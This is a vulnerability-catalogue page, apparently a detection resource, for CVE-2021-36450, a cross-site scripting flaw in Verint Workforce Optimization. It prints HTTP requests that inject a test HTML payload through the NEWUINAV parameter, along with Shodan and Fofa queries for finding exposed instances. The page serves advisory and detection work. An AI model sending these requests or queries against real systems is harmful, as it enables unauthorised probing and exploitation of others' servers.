🔙 목록으로 돌아가기

CVE-2021-36450: Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting

TitleVerint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting
Authoratomiczsec
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
RemediationApply the latest security patch or upgrade to a non-vulnerable version of Verint Workforce Optimization.
CVSS Score6.1
EPSS Score0.20063
CVE IDCVE-2021-36450
CWE IDCWE-79
Shodan Querytitle:"Verint Sign-in"http.title:"verint sign-in"
Fofa Querytitle="verint sign-in"
Tags cve2021 cve xss verint vuln

🔍 Vulnerability Description

Verint Workforce Optimization 15.2.8.10048 contains a cross-site scripting vulnerability via the control/my_notifications NEWUINAV parameter.

🌐 HTTP Request

GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Connection: close
Content-Length: 176
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login=JTmq2S

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-36450.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-36450.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A